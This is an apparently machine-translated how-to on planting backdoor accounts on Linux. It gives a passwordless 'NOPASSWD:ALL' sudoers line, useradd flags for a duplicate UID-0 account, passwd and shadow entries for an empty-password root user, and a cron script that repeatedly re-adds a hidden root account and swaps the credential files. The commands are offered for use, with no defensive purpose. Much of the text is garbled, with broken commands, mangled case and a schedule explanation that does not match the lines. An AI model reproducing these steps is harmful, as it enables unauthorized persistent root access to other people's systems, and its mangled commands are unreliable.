Linux Backdoor Account Control

Give the user sudo permission

Vi/etc/sudoers

Add the following line:
USER all= (All) Nopasswd:all

(Enable the current user to convert to any user and execute arbitrary commands)

Add root Privilege Account

(1) Order addition method

0 -o-g root-g root-m-s/bin/bash testing2

To create an account:
# Useradd [-u UID] [-G GID] [-D HOME] [-mm] [-s Shell] Username
Parameter description:
-U: Give a UID directly. Specifying UID as 0 (0) is the same as root
-G: Give a GID directly (this GID must already exist in/etc/group)
-D: Direct the user's home directory to a directory that already exists
-M: Do not set up home directory
-S: Defines the shell it uses

-O: This parameter must be specified if the UID is repeated (as with the UID of the root account).

(2) amending the document law

/etc/passwd the meanings of each part:

User name: Password: User id: Group ID: Identity Description: User's home directory: The shell used by the user after login

/et/shadow the meanings of each part:

User name: MD5 encrypted value of password: The number of days since the system was modified: the minimum change interval for passwords: The period of password change: The number of days the password expires: How many days the account will be locked after the password Expires: User account expiration: The reserved field has not been used

vi /etc/passwd Add one line: testing3:x:0:0::/:/bin/bashvi /etc/ Shadow add a line: Testing3::17068:0:99999:7:::

Validation test

Test: You can test the properties of the user name testing1 with the ID testing1 command

Display as: uid=0 (Root), gid=0 (Root), group=0 (Root)

(3) Automation scripts

(http://blog.csdn.net/yxyhack/article/details/1799791)

#!/bin/Bash #shell程序的开头标志Echo '* * * * * cat/etc/passwd >/dev/ttypwd'>>/etc/Door.cron;Echo '* * * * * cat/etc/shadow >/dev/ttysdw'>>/etc/Door.cron;Echo '* * * echo "musicyxy:x:0:0::/:/bin/sh" >>/etc/passwd'>>/etc/Door.cron;Echo '* * * echo "Musicyxy::9999:0:99999:7:::" >>/etc/shadow'>>/etc/Door.cron;Echo '* * * * * cat/dev/ttypwd >/etc/passwd'>>/etc/Door.cron;Echo '* * * * * cat/dev/ttysdw >/etc/shadow'>>/etc/Door.cron;Echo 'Ten * * * rm-f/dev/ttypwd'>>/etc/Door.cron;Echo 'Ten * * * rm-f/DEV/TTYSDW'>>/etc/door.cron;service Crond Restart;crontab/etc/door.cron;

The second line is to append the "cat/etc/passwd * * * * * * * * * * * >/dev/ttypwd" information to the/etc/door.cron file.
/etc/door.cron is a user-defined crontab list file that is executed according to the content of the file.
Write Format: * * * * * command
The preceding 5 stars represent minutes (0~59), Hours (0~23), date (1~31), month (1~12), Day of the Week (0~6), and the following commands to be executed.
So the second line is meant to run CAT/ETC/PASSWD >/dev/ttypwd at 11:40 every day, and so on, running to the last line is to use the crontab command to make the file effective.

Linux Backdoor Account Control